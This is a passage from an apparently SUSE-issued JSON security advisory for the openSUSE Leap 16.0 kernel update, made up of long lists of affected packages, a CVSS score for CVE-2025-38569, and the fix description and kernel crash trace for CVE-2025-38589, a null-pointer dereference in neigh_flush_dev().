"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38569"
},
{
"cve": "CVE-2025-38589",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38589"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nneighbour: Fix null-ptr-deref in neigh_flush_dev().\n\nkernel test robot reported null-ptr-deref in neigh_flush_dev(). [0]\n\nThe cited commit introduced per-netdev neighbour list and converted\nneigh_flush_dev() to use it instead of the global hash table.\n\nOne thing we missed is that neigh_table_clear() calls neigh_ifdown()\nwith NULL dev.\n\nLet\u0027s restore the hash table iteration.\n\nNote that IPv6 module is no longer unloadable, so neigh_table_clear()\nis called only when IPv6 fails to initialise, which is unlikely to\nhappen.\n\n[0]:\nIPv6: Attempt to unregister permanent protocol 136\nIPv6: Attempt to unregister permanent protocol 17\nOops: general protection fault, probably for non-canonical address 0xdffffc00000001a0: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000d00-0x0000000000000d07]\nCPU: 1 UID: 0 PID: 1 Comm: systemd Tainted: G T 6.12.0-rc6-01246-gf7f52738637f #1\nTainted: [T]=RANDSTRUCT\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nRIP: 0010:neigh_flush_dev.llvm.6395807810224103582+0x52/0x570\nCode: c1 e8 03 42 8a 04 38 84 c0 0f 85 15 05 00 00 31 c0 41 83 3e 0a 0f 94 c0 48 8d 1c c3 48 81 c3 f8 0c 00 00 48 89 d8 48 c1 e8 03 \u003c42\u003e 80 3c 38 00 74 08 48 89 df e8 f7 49 93 fe 4c 8b 3b 4d 85 ff 0f\nRSP: 0000:ffff88810026f408 EFLAGS: 00010206\nRAX: 00000000000001a0 RBX: 0000000000000d00 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffffc0631640\nRBP: ffff88810026f470 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000\nR13: ffffffffc0625250 R14: ffffffffc0631640 R15: dffffc0000000000\nFS: 00007f575cb83940(0000) GS:ffff8883aee00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f575db40008 CR3: 00000002bf936000 CR4: 00000000000406f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n __neigh_ifdown.llvm.6395807810224103582+0x44/0x390\n neigh_table_clear+0xb1/0x268\n ndisc_cleanup+0x21/0x38 [ipv6]\n init_module+0x2f5/0x468 [ipv6]\n do_one_initcall+0x1ba/0x628\n do_init_module+0x21a/0x530\n load_module+0x2550/0x2ea0\n __se_sys_finit_module+0x3d2/0x620\n __x64_sys_finit_module+0x76/0x88\n x64_sys_call+0x7ff/0xde8\n do_syscall_64+0xfb/0x1e8\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x7f575d6f2719\nCode: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d b7 06 0d 00 f7 d8 64 89 01 48\nRSP: 002b:00007fff82a2a268 EFLAGS: 00000246 ORIG_RAX: 0000000000000139\nRAX: ffffffffffffffda RBX: 0000557827b45310 RCX: 00007f575d6f2719\nRDX: 0000000000000000 RSI: 00007f575d584efd RDI: 0000000000000004\nRBP: 00007f575d584efd R08: 0000000000000000 R09: 0000557827b47b00\nR10: 0000000000000004 R11: 0000000000000246 R12: 0000000000020000\nR13: 0000000000000000 R14: 0000557827b470e0 R15: 00007f575dbb4270\n \u003c/TASK\u003e\nModules linked in: ipv6(+)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
